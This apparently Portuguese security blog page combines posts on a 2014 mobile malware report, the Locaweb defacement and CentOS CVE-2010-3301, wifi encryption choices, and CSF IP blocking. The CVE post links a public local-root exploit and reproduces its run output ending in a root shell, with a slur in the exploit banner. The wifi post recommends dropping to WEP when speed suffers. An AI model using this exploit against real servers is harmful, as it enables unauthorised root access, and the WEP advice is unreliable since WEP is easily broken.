Relatório de Segurança: Mobile Malware – Segundo semestre de 2014

A empresa alemã G Data Software AG divulgou o MOBILE MALWARE REPORT THREAT REPORT: H2/2014, contendo dados coletados no segundo semestre de 2014 e indicando
que a indústria do cibercrime pretende colocar em circulação malwares especificamente projetado para atacar o Android, devido ao seu crescimento, em um ritmo de 4500 novos malwares por dia.
Continue lendo “Relatório de Segurança: Mobile Malware – Segundo semestre de 2014”

Deface Locaweb , a brecha e a correção de segurança do CentOS – IA32 System Call Entry Point Vulnerability

Locaweb-20100917170827

Essa semana , com o evento  “Locaweb sofre ataque cracker” ficou conhecida a  IA32 System Call Entry Point Vulnerability do CentOS.

Se você tem um servidor com centOS  x86_64 rodando, pode executar um path de correção, facilmente: 

echo ‘:32bits:M:0:x7fELFx01::/bin/echo:’ > /proc/sys/fs/binfmt_misc/register

Dados da Falha:

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-3301
https://access.redhat.com/kb/docs/DOC-40265
Bug 634449 – (CVE-2010-3301) CVE-2010-3301 kernel: IA32 System Call Entry Point Vulnerability

Exploit:

 http://sota.gen.nz/compat2/robert_you_suck.c

Exemplo de uso do exploit:

2.6.18-194.3.1.el5 #1 SMP Thu May 13 13:08:30 EDT 2010 x86_64 x86_64 x86_64
GNU/Linux
[[email protected] ~]$ id
uid=518(hacky) gid=518(hacky) groups=518(hacky)
[[email protected] ~]$ ./a.out
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.3.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t…
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 – F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# id
uid=0(root) gid=518(hacky) groups=518(hacky)

 

Qual protocolo usar? WEP, WPA ou WPA2? R:WPA2

Resposta rápida: WPA2
Linksys-wireless-wifi-80211-we

Resposta completa:

O protocolo WEP é mais antigo, e possui um nível de segurança comprometedor, comparado com o WPA e o WPA2, sendo que estas brechas de segurança podem ser facilmente exploradas. O WPA e o WPA2 possuem maiores medidas de segurança, sendo que são conhecidas poucas vulnerabilidades do WPA2, porém estes protocolos não são compatíveis com todos os dispositivos de rede, o que torna caro a adoção deste padrão em grandes companhias com equipamentos incompatíveis. Uma característica que deve ser levada em conta é a velocidade de tráfego, que em muitas situações é maior usando WEP (menos criptografia).

 

Como dica, use WPA2 e se sentir necessidade ( se ficar lento, perder pacotes), reduza a criptografia para WPA.
Em alguns casos, precisei reduzir para WEP e fiz a restrição tamém por MAC.


Alguns riscos básicos:

 

Ao utilizar uma rede sem fio, os riscos requerem atenção especial.

 

  •  O sinal de sua rede sem fio pode estar ultrapassando seu perímetro de uso, possibilitando que um “vizinho” mal intencionado utilize algoritimo de força bruta para conseguir acesso à rede.
  • Também há o risco de “escuta” onde os dados trafegados podem estar sendo monitorados, principalmente em redes públicas, e para prevenção, utilize uma camada de criptografia – como PGP – em seus emails ou comunicações sigilosas, ou ainda um VPN.
  • Um erro muito comum, cometido por usuários inexperientes, é a utilização da configuração default do AP wireless, ficando a rede sem fio desprotegida.

Como funciona o bloqueio de IPs em servidores com CPANEL / CSF

Em servidores que utilizam o CSF como é o caso dos meus servidores, quando alguém erra repetidamente o login em algum serviço, como por exemplo email, webmail, ssh, painel de controle, o ip da rede de onde está se acessando é bloqueado e ninguém de dentro desta rede conseguirá mais acessar ao servidor.
Todos os sites que estão neste servidor que bloqueou a rede do visitante com senhas erradas serão inacessíveis a este visitante, ou seja, para a rede do visitante, o servidor está “fora do ar”.

Isso ocorre geralmente em empresas grandes, onde um usuário insiste em tentar entrar em algum lugar com senha errada e bloqueia todos de sua rede.

Depois do bloqueio, é necessário pedir ao administrador do servidor para que desbloqueie o ip da rede.

Para saber o ip da rede, deve-se acessar http://whatismyip.com/ . Este site exibirá uma mensagem :

Your IP Address Is: 189.58.162.147 

Este número IP deve ser informado ao administrador.

Se sua rede possui IP fixo, problema solucionado. Se for IP dinâmico, pode acontecer novamente quando errarem senhas novamente dentro de sua rede.